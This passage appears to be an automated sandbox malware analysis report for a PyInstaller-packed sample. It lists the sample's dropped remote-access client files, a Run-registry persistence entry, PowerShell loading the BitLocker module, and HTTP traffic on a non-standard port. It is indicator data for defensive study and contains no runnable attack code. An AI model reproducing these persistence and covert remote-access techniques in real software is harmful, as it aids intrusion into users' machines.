                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_1070CC8F LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_1070CC8F
                                Source: VCRUNTIME140.dll.0.drStatic PE information: section name: fothk
                                Source: VCRUNTIME140.dll.0.drStatic PE information: section name: _RDATA
                                Source: libcrypto-3.dll.0.drStatic PE information: section name: .00cfg
                                Source: libssl-3.dll.0.drStatic PE information: section name: .00cfg
                                Source: python311.dll.0.drStatic PE information: section name: PyRuntim
                                Source: ucrtbase.dll.0.drStatic PE information: section name: fothk
                                Source: ucrtbase.dll.0.drStatic PE information: section name: .fptable
                                Source: PCICL32.DLL.1.drStatic PE information: section name: .hhshare
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFA834AEE push 6FFDC5D5h; iretd 1_2_00007FFDFA834AF4
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFA8376D3 push 6FFDC5D5h; iretd 1_2_00007FFDFA8376D9
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFA834FEA push 6FFDC5C3h; iretd 1_2_00007FFDFA834FF0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFA837425 push 60F5C5F1h; iretd 1_2_00007FFDFA83742D
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFA834F9E push 6FFDC5CAh; ret 1_2_00007FFDFA834FA4
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFA834640 push 60F5C5F1h; iretd 1_2_00007FFDFA834648
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFA837983 push 6FFDC5CAh; ret 1_2_00007FFDFA837989
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFA8379CF push 6FFDC5C3h; iretd 1_2_00007FFDFA8379D5
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0D4021 push rcx; ret 1_2_00007FFDFB0D4022
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9A71D2A5 pushad ; iretd 3_2_00007FFD9A71D2A6
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9A8309AD push E85E505Dh; ret 3_2_00007FFD9A8309F9
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_10705B60 push eax; ret 6_2_10705B8E
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C9BB99C push edi; ret 6_2_6C9BB9AB
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C9B59A7 push 3BFFFFFFh; retf 6_2_6C9B59AC
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C9B6AF5 push ecx; ret 6_2_6C9B6B08
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C9BBA27 push edi; ret 6_2_6C9BBA29
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C9C41EF push ecx; ret 6_2_6C9C4202
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CB82D80 push eax; ret 6_2_6CB82D9E
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CB9C8CD push edx; ret 6_2_6CB9C8CE
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CB9C804 push ebx; ret 6_2_6CB9C826
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CB90995 push ecx; ret 6_2_6CB909A8
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CB9C904 push edx; ret 6_2_6CB9C90E
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBAA6AA push EF3FEFD4h; iretd 6_2_6CBAA6B1
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CB9C7E6 push ebx; ret 6_2_6CB9C802
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CB9C7D0 push ebx; ret 6_2_6CB9C7D2
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBA9CD8 pushad ; iretd 6_2_6CBA9CE6
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CB9BF60 push ecx; ret 6_2_6CB9BF73
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBA1831 push edi; ret 6_2_6CBA1832
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CB995D5 push eax; ret 6_2_6CB995D6
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CB99619 push eax; ret 6_2_6CB9961A
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CC7ED5B push 3BFFFFFEh; ret 6_2_6CC7ED66
                                Source: msvcr100.dll.1.drStatic PE information: section name: .text entropy: 6.909044922675825

                                Persistence and Installation Behavior

                                barindex
                                Found pyInstaller with non standard icon
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeProcess created: "C:\Users\user\Desktop\BUenB12U2a.exe"
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\_cffi_backend.cp311-win_amd64.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\unicodedata.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\_hashlib.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-kernel32-legacy-l1-1-1.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\pyexpat.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Roaming\extracted\PCICL32.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Roaming\extracted\AudioCapture.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-fibers-l1-1-1.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\select.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\libcrypto-3.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Roaming\extracted\pcicapi.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\python3.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\ucrtbase.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Roaming\extracted\client32.exeJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\_elementtree.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\PIL\_imagingtk.cp311-win_amd64.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\python311.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-fibers-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-file-l1-2-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-console-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Roaming\extracted\TCCTL32.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\cryptography\hazmat\bindings\_rust.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\_queue.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-file-l2-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\PIL\_webp.cp311-win_amd64.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-sysinfo-l1-2-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\_ctypes.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\VCRUNTIME140.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Roaming\extracted\PCICHEK.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\_socket.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\_lzma.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\_bz2.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\_ssl.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\PIL\_imagingcms.cp311-win_amd64.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\_decimal.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-util-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-file-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\libffi-8.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\libssl-3.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Roaming\extracted\HTCTL32.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\PIL\_imaging.cp311-win_amd64.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\psutil\_psutil_windows.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Roaming\extracted\msvcr100.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI69962\PIL\_imagingmath.cp311-win_amd64.pydJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C9A4F80 ctl_open,LoadLibraryA,InitializeCriticalSection,CreateEventA,CreateEventA,CreateEventA,CreateEventA,WSAStartup,_malloc,_memset,_malloc,_memset,_malloc,_memset,GetTickCount,CreateThread,SetThreadPriority,GetModuleFileNameA,GetPrivateProfileIntA,GetModuleHandleA,CreateMutexA,6_2_6C9A4F80
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C993F40 GetPrivateProfileIntA,6_2_6C993F40
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C993B90 CreateFileA,wsprintfA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,CreateFileA,GetFileSize,GetPrivateProfileIntA,SetFilePointer,FlushFileBuffers,CloseHandle,wsprintfA,CreateFileA,__itow,WritePrivateProfileStringA,6_2_6C993B90
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C993BC7 GetPrivateProfileIntA,wsprintfA,CreateFileA,GetFileSize,GetPrivateProfileIntA,SetFilePointer,FlushFileBuffers,CloseHandle,wsprintfA,CreateFileA,__itow,WritePrivateProfileStringA,6_2_6C993BC7
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C9A5318 GetPrivateProfileIntA,GetModuleHandleA,CreateMutexA,6_2_6C9A5318
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Client32Jump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Client32Jump to behavior

                                Hooking and other Techniques for Hiding and Protection

                                barindex
                                Loading BitLocker PowerShell Module
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                Uses known network protocols on non-standard ports
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1488 -> 49733
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1488 -> 49733
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CD67AB0 IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,6_2_6CD67AB0
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CD86CD0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,6_2_6CD86CD0
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CD86CD0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,6_2_6CD86CD0
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CD00C80 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,6_2_6CD00C80
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CD00C80 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,6_2_6CD00C80
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CC62B70 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,6_2_6CC62B70
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CC624D0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,6_2_6CC624D0
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CD44410 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,6_2_6CD44410
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CD52420 IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,6_2_6CD52420
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CCF6640 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,6_2_6CCF6640
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF76CA176B0 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,0_2_00007FF76CA176B0
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
